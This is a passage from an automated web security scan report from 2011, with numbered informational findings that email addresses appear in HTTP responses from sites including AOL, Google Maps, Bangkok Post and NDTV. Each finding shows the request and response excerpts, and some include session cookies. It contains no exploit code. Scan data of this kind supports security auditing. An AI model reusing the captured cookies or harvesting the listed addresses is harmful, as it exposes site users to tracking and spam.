Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: max-age=1
Expires: Sun, 04 Sep 2011 11:11:21 GMT
ntCoent-Length: 682
Content-Type: text/html; charset=iso-8859-1
Content-Length: 682

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>200 OK</title>
</head><body>
<h1>OK</h1>
<p>The server encountered an internal error or
misconfiguration and was unable to comple
...[SNIP]...
<p>Please contact the server administrator,
you@example.com and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
...[SNIP]...

25.21. http://advertising.aol.com/token/4/3/1727096706/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/4/3/1727096706/

Issue detail

The following email address was disclosed in the response:

Request

GET /token/4/3/1727096706/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:48:24 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: max-age=1
Expires: Sun, 04 Sep 2011 11:48:25 GMT
ntCoent-Length: 682
Content-Type: text/html; charset=iso-8859-1
Content-Length: 682

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>200 OK</title>
</head><body>
<h1>OK</h1>
<p>The server encountered an internal error or
misconfiguration and was unable to comple
...[SNIP]...
<p>Please contact the server administrator,
you@example.com and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
...[SNIP]...

25.22. http://advertising.aol.com/token/5/2/2011695027/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/5/2/2011695027/

Issue detail

The following email address was disclosed in the response:

Request

GET /token/5/2/2011695027/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:09:29 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: max-age=1
Expires: Sun, 04 Sep 2011 11:09:30 GMT
ntCoent-Length: 682
Content-Type: text/html; charset=iso-8859-1
Content-Length: 682

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>200 OK</title>
</head><body>
<h1>OK</h1>
<p>The server encountered an internal error or
misconfiguration and was unable to comple
...[SNIP]...
<p>Please contact the server administrator,
you@example.com and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
...[SNIP]...

25.23. http://advertising.aol.com/token/5/3/803328935/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/5/3/803328935/

Issue detail

The following email address was disclosed in the response:

Request

GET /token/5/3/803328935/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:47:40 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: max-age=1
Expires: Sun, 04 Sep 2011 11:47:41 GMT
ntCoent-Length: 682
Content-Type: text/html; charset=iso-8859-1
Content-Length: 682

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>200 OK</title>
</head><body>
<h1>OK</h1>
<p>The server encountered an internal error or
misconfiguration and was unable to comple
...[SNIP]...
<p>Please contact the server administrator,
you@example.com and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
...[SNIP]...

25.24. http://advertising.aol.com/token/6/1/737485457/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/6/1/737485457/

Issue detail

The following email address was disclosed in the response:

Request

GET /token/6/1/737485457/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:09:24 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: max-age=1
Expires: Sun, 04 Sep 2011 11:09:25 GMT
ntCoent-Length: 682
Content-Type: text/html; charset=iso-8859-1
Content-Length: 682

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>200 OK</title>
</head><body>
<h1>OK</h1>
<p>The server encountered an internal error or
misconfiguration and was unable to comple
...[SNIP]...
<p>Please contact the server administrator,
you@example.com and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
...[SNIP]...

25.25. http://advertising.aol.com/token/6/3/807811660/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/6/3/807811660/

Issue detail

The following email address was disclosed in the response:

Request

GET /token/6/3/807811660/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:49:16 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: max-age=1
Expires: Sun, 04 Sep 2011 11:49:17 GMT
ntCoent-Length: 682
Content-Type: text/html; charset=iso-8859-1
Content-Length: 682

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>200 OK</title>
</head><body>
<h1>OK</h1>
<p>The server encountered an internal error or
misconfiguration and was unable to comple
...[SNIP]...
<p>Please contact the server administrator,
you@example.com and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
...[SNIP]...

25.26. http://advertising.aol.com/token/7/1/585611182/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/7/1/585611182/

Issue detail

The following email address was disclosed in the response:

Request

GET /token/7/1/585611182/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:09:52 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: max-age=1
Expires: Sun, 04 Sep 2011 11:09:53 GMT
ntCoent-Length: 682
Content-Type: text/html; charset=iso-8859-1
Content-Length: 682

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>200 OK</title>
</head><body>
<h1>OK</h1>
<p>The server encountered an internal error or
misconfiguration and was unable to comple
...[SNIP]...
<p>Please contact the server administrator,
you@example.com and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
...[SNIP]...

25.27. http://advertising.aol.com/token/7/3/1807570122/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/7/3/1807570122/

Issue detail

The following email address was disclosed in the response:

Request

GET /token/7/3/1807570122/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:49:21 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: max-age=1
Expires: Sun, 04 Sep 2011 11:49:22 GMT
ntCoent-Length: 682
Content-Type: text/html; charset=iso-8859-1
Content-Length: 682

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>200 OK</title>
</head><body>
<h1>OK</h1>
<p>The server encountered an internal error or
misconfiguration and was unable to comple
...[SNIP]...
<p>Please contact the server administrator,
you@example.com and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
...[SNIP]...

25.28. http://advertising.aol.com/token/8/1/592246145/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/8/1/592246145/

Issue detail

The following email address was disclosed in the response:

Request

GET /token/8/1/592246145/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:10:23 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: max-age=1
Expires: Sun, 04 Sep 2011 11:10:24 GMT
ntCoent-Length: 682
Content-Type: text/html; charset=iso-8859-1
Content-Length: 682

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>200 OK</title>
</head><body>
<h1>OK</h1>
<p>The server encountered an internal error or
misconfiguration and was unable to comple
...[SNIP]...
<p>Please contact the server administrator,
you@example.com and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
...[SNIP]...

25.29. http://advertising.aol.com/token/8/3/1337747048/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://advertising.aol.com
Path:   /token/8/3/1337747048/

Issue detail

The following email address was disclosed in the response:

Request

GET /token/8/3/1337747048/ HTTP/1.1
Host: advertising.aol.com
Proxy-Connection: keep-alive
Referer: http://advertising.aol.com/nai/nai.php?action_id=3
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 11:49:30 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7m DAV/2 mod_rsp20/rsp_plugins_v15.08-07-29:mod_rsp2.2.so.rhe-5-x86_64.v15.2
Cache-Control: max-age=1
Expires: Sun, 04 Sep 2011 11:49:31 GMT
ntCoent-Length: 682
Content-Type: text/html; charset=iso-8859-1
Content-Length: 682

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>200 OK</title>
</head><body>
<h1>OK</h1>
<p>The server encountered an internal error or
misconfiguration and was unable to comple
...[SNIP]...
<p>Please contact the server administrator,
you@example.com and inform them of the time the error occurred,
and anything you might have done that may have
caused the error.</p>
...[SNIP]...

25.30. http://cps.regis.edu/lp/computer_degree/it_degree.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://cps.regis.edu
Path:   /lp/computer_degree/it_degree.php

Issue detail

The following email address was disclosed in the response:

Request

GET /lp/computer_degree/it_degree.php HTTP/1.1
Host: cps.regis.edu
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:13:14 GMT
Server: Apache/2.2.9 (Unix) mod_ssl/2.2.9 OpenSSL/0.9.7a DAV/2 mod_bwlimited/1.4
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Cache-Control: max-age=1, private, must-revalidate
Connection: close
Content-Type: text/html
Content-Length: 13859

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-T
...[SNIP]...
<a class="email" href="mailto:info@regis.edu"
title="Email us at info@regis.edu for more information on CPS programs">info@regis.edu</a>
...[SNIP]...

25.31. http://ibeat.indiatimes.com/js/pgtracking.js  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ibeat.indiatimes.com
Path:   /js/pgtracking.js

Issue detail

The following email address was disclosed in the response:

Request

GET /js/pgtracking.js?random=1 HTTP/1.1
Host: ibeat.indiatimes.com
Proxy-Connection: keep-alive
Referer: http://timesofindia.indiatimes.com/city/mumbai/My-friend-Ganesha/articleshow/9855193.cms
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: sosh=true; RMID=32177b6a4e62e1a0; RMFD=011R02OxO206Bs|O108EZ|O108FG|O108i0|O108ih

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 03:12:49 GMT
Server: Apache/2.2.11 (Unix) mod_jk/1.2.26
Last-Modified: Tue, 12 Jul 2011 11:06:24 GMT
ETag: "73e786-14fa-4a7dd4a5c0c00"-gzip
Accept-Ranges: bytes
Cache-Control: max-age=2592000
Expires: Tue, 04 Oct 2011 03:12:49 GMT
Vary: Accept-Encoding,User-Agent
Content-Length: 5370
Content-Type: application/javascript

/*
* This Script is used to Log the access log data
* Author : ram.awasthi@timesgroup.com
* (c) Times Business Solutions Limited
* Date: 16/7/2010
*/


if(!iBeatPgTrend) {
   var iBeatPgTrend = {
       version : 1.0,
       
       key : "",
       host : "",
       domain : "
...[SNIP]...

25.32. http://images.google.com/support/bin/answer.py  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://images.google.com
Path:   /support/bin/answer.py

Issue detail

The following email address was disclosed in the response:

Request

GET /support/bin/answer.py HTTP/1.1
Host: images.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 04:15:15 GMT
Expires: Sun, 04 Sep 2011 04:15:15 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html lang=""
class="">
<head>
<pre style="font-size: 0;display: none;visibility: hidden;">


</pre>
<script
...[SNIP]...
<strong>test@fastdial.net</strong>
...[SNIP]...

25.33. https://maps-api-ssl.google.com/maps  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://maps-api-ssl.google.com
Path:   /maps

Issue detail

The following email address was disclosed in the response:

Request

GET /maps HTTP/1.1
Host: maps-api-ssl.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:15:26 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Server: mfe
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Connection: close

<!DOCTYPE html><html class="no-maps-mini" xmlns:v="urn:schemas-microsoft-com:vml"> <head> <meta content="text/html;charset=UTF-8" http-equiv="content-type"/> <meta content="Find local businesses, vie
...[SNIP]...
on(){m.prm&&m.prm()},Va=function(a){y("m",function(){m.spn(a)})},Wa=function(a){y("m",function(){m.spp(a)})};n("spn",Va);n("spp",Wa);Ca("gbd4",Ua);
if(_tvb("true",e)){var Xa={g:_tvv("1"),d:_tvv(""),e:"test@fastdial.net",m:"fastdial.net",p:"//lh4.googleusercontent.com/-V_veHrrsDKY/AAAAAAAAAAI/AAAAAAAAAAA/XUAjI0bxyLA/s96-c/photo.jpg",xp:_tvv("1"),mg:"%1$s (delegated)",md:"%1$s (default)"};v.prf=Xa}
function Ya(){funct
...[SNIP]...
<span id=gbi4m1>test@fastdial.net</span>
...[SNIP]...
<span class=gbps2>test@fastdial.net</span>
...[SNIP]...
sl.google.com/intl/en_us/mapfiles/","363c",0,,1,1,1,1,1,1,,,"https://cbks0.google.com",1,20,4096,,,,,,,,["rst","util"],["lt_c","pplhs","mg","stats"],,,1000,1,"maps_sv",4,,,1,,,"//gg.google.com/csi",0,"test@fastdial.net","",0,["https://khmdbs0.google.com/kh?v=000006\x26","https://khmdbs1.google.com/kh?v=000006\x26"],,"/maps/c",,,1,0,[["act_s",["act"]],["qopa",["act","qop","act_s"]],["ms",["info"]],["mv",["act"]],["cb
...[SNIP]...

25.34. http://maps.google.com/maps  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://maps.google.com
Path:   /maps

Issue detail

The following email address was disclosed in the response:

Request

GET /maps HTTP/1.1
Host: maps.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:15:30 GMT
Expires: -1
Cache-Control: private, max-age=0
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Server: mfe
X-XSS-Protection: 1; mode=block
X-Frame-Options: SAMEORIGIN
Connection: close

<!DOCTYPE html><html class="no-maps-mini" xmlns:v="urn:schemas-microsoft-com:vml"> <head> <meta content="text/html;charset=UTF-8" http-equiv="content-type"/> <meta content="Find local businesses, vie
...[SNIP]...
on(){m.prm&&m.prm()},Va=function(a){y("m",function(){m.spn(a)})},Wa=function(a){y("m",function(){m.spp(a)})};n("spn",Va);n("spp",Wa);Ca("gbd4",Ua);
if(_tvb("true",e)){var Xa={g:_tvv("1"),d:_tvv(""),e:"test@fastdial.net",m:"fastdial.net",p:"//lh4.googleusercontent.com/-V_veHrrsDKY/AAAAAAAAAAI/AAAAAAAAAAA/XUAjI0bxyLA/s96-c/photo.jpg",xp:_tvv("1"),mg:"%1$s (delegated)",md:"%1$s (default)"};v.prf=Xa}
function Ya(){funct
...[SNIP]...
<span id=gbi4m1>test@fastdial.net</span>
...[SNIP]...
<span class=gbps2>test@fastdial.net</span>
...[SNIP]...
us/mapfiles/","/intl/en_us/mapfiles/","363c",0,,1,1,1,1,1,1,,,"http://cbk0.google.com",1,20,4096,,,,,,,,["rst","util"],["lt_c","pplhs","mg","stats"],,,1000,1,"maps_sv",4,,,1,,,"//gg.google.com/csi",0,"test@fastdial.net","",0,["http://khmdb0.google.com/kh?v=000006\x26","http://khmdb1.google.com/kh?v=000006\x26"],,"/maps/c",,,1,0,[["act_s",["act"]],["qopa",["act","qop","act_s"]],["ms",["info"]],["mv",["act"]],["cb_app
...[SNIP]...

25.35. http://member.bangkokpost.com/login.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://member.bangkokpost.com
Path:   /login.php

Issue detail

The following email addresses were disclosed in the response:

Request

GET /login.php HTTP/1.1
Host: member.bangkokpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:28:09 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.9
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22084

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
<title>Bangkok Post -
...[SNIP]...
<a href="mailto:tippawann@Bangkokpost.co.th">
...[SNIP]...
<a href="mailto:classified@bangkokpost.co.th">
...[SNIP]...

25.36. http://ndtvjobs.bixee.com/search/search/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ndtvjobs.bixee.com
Path:   /search/search/

Issue detail

The following email address was disclosed in the response:

Request

GET /search/search/ HTTP/1.1
Host: ndtvjobs.bixee.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 04:15:57 GMT
Server: ibibo-WS
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 53966

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conten
...[SNIP]...
<a rel="nofollow" href="mailto:contactus@bixee.com">
...[SNIP]...

25.37. http://social.ndtv.com/NDTVProfit  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://social.ndtv.com
Path:   /NDTVProfit

Issue detail

The following email address was disclosed in the response:

Request

GET /NDTVProfit HTTP/1.1
Host: social.ndtv.com
Proxy-Connection: keep-alive
Referer: http://social.ndtv.com/home.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=165355488.441276387.1315103188.1315103188.1315103188.1; __utmb=165355488.4.10.1315103194; __utmc=165355488; __utmz=165355488.1315103194.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=bangkok%20thailand%20news; _SUPERFLY_nosample=1; PHPSESSID=06690e83b26d060ea9197b90799f6b1f; __utma=126395663.1992920947.1315103192.1315103192.1315103192.1; __utmb=126395663.5.10.1315103192; __utmc=126395663; __utmz=126395663.1315103192.1.1.utmcsr=ndtv.com|utmccn=(referral)|utmcmd=referral|utmcct=/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142; _chartbeat2=efl9lo3odsxv1y4d

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny10 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny10
Content-Length: 61917
Expires: Sun, 04 Sep 2011 03:38:28 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 03:38:28 GMT
Connection: close
Vary: Accept-Encoding

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xmlns:
...[SNIP]...
<a href="mailto:ndtvsocial@ndtv.com" class="fn fl">
...[SNIP]...

25.38. http://social.ndtv.com/groups.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://social.ndtv.com
Path:   /groups.php

Issue detail

The following email address was disclosed in the response:

Request

GET /groups.php HTTP/1.1
Host: social.ndtv.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Apache/2.2.9 (Debian) PHP/5.2.6-1+lenny10 with Suhosin-Patch mod_ssl/2.2.9 OpenSSL/0.9.8g
X-Powered-By: PHP/5.2.6-1+lenny10
Expires: Sun, 04 Sep 2011 04:19:00 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sun, 04 Sep 2011 04:19:00 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 60062

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://ogp.me/ns#" xmlns:
...[SNIP]...
<a href="mailto:ndtvsocial@ndtv.com" class="fn fl">
...[SNIP]...

25.39. http://social.ndtv.com/home.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://social.ndtv.com
Path:   /home.php

Issue detail

The following email address was disclosed in the response:

Request

GET /home.php HTTP/1.1
Host: social.ndtv.com
Proxy-Connection: keep-alive
Referer: http://www.ndtv.com/article/india/turkish-air-plane-skids-off-taxiway-at-mumbai-airport-130917
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=126395663.1992920947.1315103192.1315103192.1315103192.1; __utmb=126395663.4.10.1315103192; __utmc=126395663; __utmz=126395663.1315103192.1.1.utmcsr=ndtv.com|utmccn=(referral)|utmcmd=referral|utmcct=/article/india/48-hours-on-mumbai-airports-main-runway-still-shut-131142; __utma=165355488.441276387.1315103188.1315103188.1315103188.1; __utmb=165355488.4.10.1315103194; __utmc=165355488; __utmz=165355488.1315103194.1.1.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=bangkok%20thailand%20news; _chartbeat2=efl9lo3odsxv1y4d; _SUPERFLY_nosample=1

Response

HTTP/1.1 200 OK
